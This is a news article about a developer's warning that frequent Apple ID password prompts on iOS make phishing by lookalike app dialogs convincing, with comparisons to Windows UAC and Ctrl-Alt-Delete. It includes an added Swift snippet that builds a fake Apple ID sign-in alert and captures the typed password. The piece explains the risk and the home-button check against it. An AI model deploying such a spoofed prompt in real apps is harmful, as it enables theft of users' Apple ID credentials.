The iPhone's habit of repeatedly asking for your Apple ID password, with little explanation or warning, is not just annoying: it is also a security flaw that could make attackers' phishing attempts extremely convincing, an iOS developer has warned.
Regular iPhone and iPad users will be familiar with the sporadic requests from the operating system to enter their Apple ID password, which appear in the middle of other activities and block them from continuing until they comply.
It can be frustrating, especially if the password is long and complex, and it is often hard to work out exactly why the device needs your credentials. But according to developer Felix Krause, the constant prompts are more than an irritation.
"Users have been trained to simply enter their Apple ID password whenever iOS prompts them. These pop-ups are not only shown on the lock screen and the home screen, but also inside random apps, for example when they want to access iCloud, GameCenter or in-app purchases," said Krause.
"This could easily be abused by any app, simply by showing [an alert] that looks exactly like the system dialog. Even users who know a lot about technology have a hard time detecting that such alerts are phishing attacks."
Apple's own alerts look the same as the standard alerts available to any developer, Krause said, which means a well-crafted phishing pop-up gives no visual cue that anything is wrong.
As things stand, there is only one way a user can be sure that a password request comes from Apple and not from a rogue app, said Krause: press the home button before entering the password. Only the operating system itself can respond to the home button. Any other app is pushed into the background, taking its dialog with it, so a fake prompt disappears while a genuine system prompt stays on screen.
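To make concrete how little is needed, the following Swift snippet is an added illustration written for this article; it is not Krause's code and not taken from any app. It builds a password dialog with the public UIAlertController API that any App Store app may call. The title and message strings are constructed to resemble Apple's prompt rather than copied from iOS, and the `harvested` array is a hypothetical stand-in for whatever a malicious app would do with the password; nothing here is sent anywhere.

```swift
import UIKit

// Added illustration (not from the article or from Felix Krause): a fake
// Apple ID password prompt built entirely from public UIKit API. Title and
// message text are constructed approximations of the real prompt, and
// `harvested` is a hypothetical placeholder for an attacker's sink.
final class FakeAppleIDPromptDemo {
    private(set) var harvested: [String] = []

    /// Builds an alert that looks like a system sign-in prompt.
    func makeFakePrompt() -> UIAlertController {
        let alert = UIAlertController(
            title: "Sign In to iTunes Store",                  // constructed text
            message: "Enter the password for your Apple ID.",  // constructed text
            preferredStyle: .alert)

        alert.addTextField { field in
            field.placeholder = "Password"
            field.isSecureTextEntry = true   // masked input, same as the real prompt
        }

        alert.addAction(UIAlertAction(title: "Cancel", style: .cancel, handler: nil))
        alert.addAction(UIAlertAction(title: "OK", style: .default) { [weak self, weak alert] _ in
            // The app, not iOS, receives whatever the user typed.
            if let password = alert?.textFields?.first?.text, !password.isEmpty {
                self?.harvested.append(password)   // hypothetical attacker sink
            }
        })
        return alert
    }

    /// Presents the fake prompt from any view controller the app controls.
    func present(from viewController: UIViewController) {
        viewController.present(makeFakePrompt(), animated: true)
    }
}
```

The alert is owned by the presenting app's window, which is exactly why the home-button check above works: backgrounding the app removes the alert, whereas a genuine system prompt is not tied to any third-party app. For a legitimate app the lesson is the inverse: never ask for the Apple ID password in your own UI at all, so that users have no reason to accept such a dialog from any app.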
There is no evidence that Krause's technique has been put into practice by an unscrupulous developer, and to use it for an effective phishing attack there are two further obstacles to overcome: the app must get past Apple's reviewers to appear in the App Store, and the developer must convince users to install it.
The problem is not unique to Apple, though. "Security fatigue", the risk that users become so overwhelmed by security prompts that the prompts themselves end up creating insecurity, is a long-standing one.
Windows Vista famously shipped with a feature called User Account Control, designed to stop malicious programs from taking over an infected computer. In practice it meant the operating system interrupted the user to ask for permission almost every time a program wanted to do something. Users quickly learned to click through without reading the dialog, undoing any security gain, and Microsoft was eventually forced to substantially rework the feature in Windows 7.
Years earlier, however, Microsoft had already solved one of the problems iOS now faces. In its business-oriented versions of Windows, it found an ingenious way to guarantee that malware could not spoof a request for the user's password: the real logon screen could only be reached by pressing Ctrl-Alt-Delete, a key combination that only Windows itself can respond to.
It is the same idea as Krause's suggestion of pressing the home button before entering a password, except that Microsoft implemented it almost 20 years ago. The more things change, the more they stay the same.